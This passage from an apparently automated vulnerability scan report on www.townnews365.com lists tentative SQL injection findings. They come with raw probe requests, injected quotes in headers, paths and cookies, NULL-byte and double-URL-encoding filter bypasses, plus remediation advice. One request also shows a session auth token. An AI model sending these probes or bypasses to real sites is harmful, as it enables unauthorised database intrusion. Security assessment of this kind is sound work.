GET /tncms/ads/[random_number]/section-sponsor1/8''/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:08 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.67. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/8/10/285/8102859a-4455-11df-bf21-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:43 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.68. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1%00'/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1%00''/b/9c/eb0/b9ceb062-4679-11df-8659-001cc4c03286.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:34 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.69. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/d/7a/1e5/d7a1e5f0-fef8-11de-9e7f-001cc4c002e0.image.jpg HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:10 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.70. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/f/06/dcb/f06dcbfc-4346-11df-9060-001cc4c03286.image.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:26 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.71. http://www.townnews365.com/tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:16 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.72. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif%00' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif%00'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:12 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.73. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:47 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.74. http://www.townnews365.com/user-generated_solutions/enhanced_video/demonstration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /user-generated_solutions/enhanced_video/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user-generated_solutions/enhanced_video/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /user-generated_solutions/enhanced_video/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

2.75. http://www.townnews365.com/user-generated_solutions/user_account_contributions/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /user-generated_solutions/user_account_contributions/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user-generated_solutions/user_account_contributions/?login_success=true HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751%2527; __utmb=121545751.6.10.1305412213; tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /user-generated_solutions/user_account_contributions/?login_success=true HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751%2527%2527; __utmb=121545751.6.10.1305412213; tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3879112
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:44 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5086
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp14
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 37636


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.76. http://www.townnews365.com/users/admin/service/purchase/ [service_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/admin/service/purchase/

Issue detail

The service_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the service_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the service_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/admin/service/purchase/?service_id=378%2527&referer_url=/user-generated_solutions/user_account_contributions/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/admin/service/purchase/?service_id=378%2527%2527&referer_url=/user-generated_solutions/user_account_contributions/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4009152
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:44:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5807
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 38053


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.77. http://www.townnews365.com/users/forgot/global/resources/images/icon-03.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/forgot/global/resources/images/icon-03.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/forgot/global/resources/images/icon-03.gif?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/forgot/global/resources/images/icon-03.gif?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:44 GMT
Connection: close
Content-Length: 26

417 Cache busting detected

2.78. http://www.townnews365.com/users/forgot/global/resources/images/icon-04.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/forgot/global/resources/images/icon-04.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/forgot%2527/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/forgot%2527%2527/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:04 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.79. http://www.townnews365.com/users/login/global/resources/images/icon-03.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-03.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/login/global/resources%2527/images/icon-03.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login/global/resources%2527%2527/images/icon-03.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:25 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.80. http://www.townnews365.com/users/login/global/resources/images/icon-04.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-04.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /users/login'/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login''/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:19 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.81. http://www.townnews365.com/users/login/global/resources/images/icon-05.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-05.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /users'/login/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users''/login/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:26 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.82. http://www.townnews365.com/users/login/global/resources/styles/print.css [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/styles/print.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /users/login/global/resources/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
